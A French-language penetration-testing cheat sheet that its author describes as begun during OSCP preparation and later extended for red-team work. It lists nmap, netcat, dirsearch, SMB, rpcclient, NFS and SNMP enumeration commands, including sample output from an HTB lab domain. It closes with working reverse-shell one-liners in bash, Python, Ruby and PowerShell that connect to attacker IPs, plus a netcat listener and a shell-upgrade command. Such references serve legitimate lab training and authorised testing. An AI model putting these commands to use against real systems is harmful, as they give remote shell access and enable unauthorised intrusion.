
Il y a beaucoup de cheat sheets, mais voici la mienne.
Il existe de nombreuses antisèches, mais celle-ci est la mienne. C'est un travail en cours pour le moment, et ça vit comme un brouillon mis à jour souvent, par moments. Je l'ai commencée pendant que je préparais mon OSCP, mais elle évolue désormais pour inclure des choses plus pratiques dont j'ai besoin en tant que red teamer. Les nouveaux ajouts ne seront très probablement d'aucune utilité pour l'examen, et pourraient même inclure des outils interdits.
Très incomplète...
find / -name flag.txt pour trouver des fichiers par leur nom.
grep -R "flag40" / -s -n pour chercher une chaîne dans les fichiers, en les parcourant récursivement depuis le répertoire racine, sans sortie d'erreur.
dir /s flag.txt pour trouver les fichiers nommés flag.txt dans le répertoire courant et ses sous-répertoires.
Un outil utile -> wadcoms.github.io
nmap -sn 10.11.1.0/24 balayage réseau pour trouver des hôtes.
nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt balayer le réseau pour trouver les IP actives, et enregistrer les adresses IP dans une liste.nmap -A 10.10.10.10 pour un scan rapide des ports TCP courants avec détection d'OS et de services.
nmap -A 10.10.10.10 -p- pour scanner tous les ports TCP avec détection d'OS et de services.
nmap -A -sU 10.10.10.10 pour scanner tous les ports UDP avec détection d'OS et de services.
sudo nmap -O -A -sV 10.10.10.10 pour scanner tous les ports TCP courants, identifier l'OS, exécuter des scripts et récupérer les bannières.
proxychains nmap -Pn -sT 10.10.10.10 -v car les scans ICMP/UDP ne fonctionnent pas.
L'option -w permet de spécifier un délai d'expiration en secondes et l'option -z d'envoyer zéro donnée (pour le scan)
nc -nvv -w 1 -z 10.11.1.220 3388-3390 scan TCP des ports 3388 à 3390.
nc -nv -u -z -w 1 10.11.1.115 160-162 scan UDP des ports 160 à 162.
gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt.J'aime aussi dirsearch.
Wordlists utiles sur Kali
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r énumération de répertoires avec big.txt de dirb, copier/coller et juste IP/URL et extensions.
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r énumération de répertoires avec la liste de répertoires de dirbuster, copier/coller et juste IP/URL et extensions.
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r, force brute des CGI.
Un module rsync est essentiellement un partage de répertoire. Ces modules peuvent éventuellement être protégés par un mot de passe. Cette option liste les modules disponibles et, éventuellement, détermine si le module nécessite un mot de passe pour y accéder**:**
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
smbclient -L 10.11.1.146 Pour lister les partages disponibles
smbclient //10.11.1.146/IPC$ pour vous connecter à ce partage. Si ça ne fonctionne pas, essayez sudo... sudo smbclient //10.11.1.146/IPC$
enum4linux 10.11.1.146 -a -o pour utiliser enum4linux et automatiser les partages SMB.
Si vous pouvez vous connecter avec une connexion Null -> rpcclient -U '' -N forest.htb.
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 105
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
Bon article
Un autre bon article
showmount -e 10.10.10.10 pour voir les montages disponibles
mount -t nfs 10.10.10.10:/ /tmp -o nolock pour monter la racine, ou n'importe quel dossier.
onesixtyone -c community -i ips scanner le réseau cible pour identifier les serveurs SNMP où community et ips sont des listes community = (public, private, manager).
snmp-check 10.11.1.227 fait tout ce qui est ci-dessous, mais en mieux et formate le résultat pour vous joliment :)
snmpwalk -c public -v1 -t 10 10.11.1.115 énumère tout l'arbre MIB.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 énumère les utilisateurs Windows.
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 énumère les processus Windows en cours d'exécution.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 énumère les ports TCP ouverts.
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 énumère les logiciels installés.
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc -lvp 4444 écouter (attraper) le shell inversé avec Netcat sur le port 4444
python -c 'import pty; pty.spawn("/bin/bash")' ou python3 -c 'import pty; pty.spawn("/bin/bash")'